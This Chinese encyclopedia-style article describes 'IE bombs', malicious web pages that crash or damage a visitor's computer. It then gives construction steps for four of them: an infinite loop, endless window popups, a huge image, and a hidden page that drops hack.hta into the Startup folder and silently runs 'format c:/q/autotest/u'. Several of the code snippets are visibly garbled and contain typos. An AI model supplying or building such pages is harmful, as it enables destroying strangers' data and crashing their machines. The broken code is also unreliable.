IE炸彈是指有一段代碼的執行會陷入無窮的循環,最終導致資源耗盡,影響計算機的使用。
基本介紹
- 中文名:IE炸彈
- 外文名:IE bomb
- 第一條:IE炸彈的原理
- 第二條:IE炸彈的製作
- 第三條:打開視窗死循環
炸彈原理,製作方式,
炸彈原理
在一些惡意網頁中,埋伏了IE視窗炸彈。
IE視窗炸彈的主要形式有以下幾種:1.死循環 死循環使者在網頁的代碼中,有一段代碼的執行會陷入無窮的循環,最終導致資源耗盡。2.打開視窗死循環 打開視窗死循環是比較常見的IE視窗炸彈,當特定的網頁代碼被執行時,就會不停的打開新的視窗。3.超大圖片 這種炸彈通常在網頁中把圖書的設定為一個很大的數字,當IE打開此網頁時,就會不斷地解析試圖打開,但由於圖片實在是太長了,超出了其處理能力,最終導致電腦當機。4.格式化硬碟 當瀏覽某網頁時,某程式設計師把特定的檔案悄悄的寫入到電腦中,暗中格式化硬碟。這主要是利用微軟未公開的格式化命令參數使得格式化硬碟時不會出現提示,並且使格式化時處於最小化的狀態。
製作方式
1.死循環
新建一個網頁,在網頁中加入以下代碼“<html><body><img src=**** location="index.htm"></body></html>”,在以上代碼所示的王一種,代碼“<img src=**** location="index.htm">”正是導致死循環的原因。
2.打開視窗死循環
新建一個網頁,在網頁中加入以下代碼“<html><body><img src=**** n=1 "do{windows.open('')}while(n==1)" width="1"></body></html>”。當網頁代碼被執行時,就會不停地打開新的視窗,用不了多久電腦就會當機。
3.超大圖片
新建一個網頁,在網頁中加入以下代碼,“<html><body> <img src=**** width="2" height="*****(很大的數字)" </body></html>”。設定吃喔出CPU處理範圍的大圖片來使CPU超出負荷。當IE執行此語句時,就會不斷地解析試圖打開,但由於圖片實在是太大了,超出了其處理能力,最終導致電腦當機。
4.格式化硬碟
由於該方式危害實在太大了,僅寫出關鍵代碼。新建一個網頁,在網頁中加入以下代碼,①“src.Path="C:\\WINDOWS\\StartMenu\\Programs\\啟動\\hack.hta”,這一項就是指當網頁執行時,它會寫入到電腦的啟動目錄下,並命名為hack.hta。②“wsh.Run('start.exe/m format c:/q/autotest/u')”,通常要格式化硬碟都會先詢問是否要執行,但其中“/autotest”這項,是微軟一個沒有公開的功能,輸入“format”後的動作便會被強制執行。這項中的“/q/u”是令系統不需要檢查硬碟便會立即執行的指令。最後,“start.exe”再配合“/m”選項可以使format的DOS-prompt視窗在執行的是有處於最小化的狀態。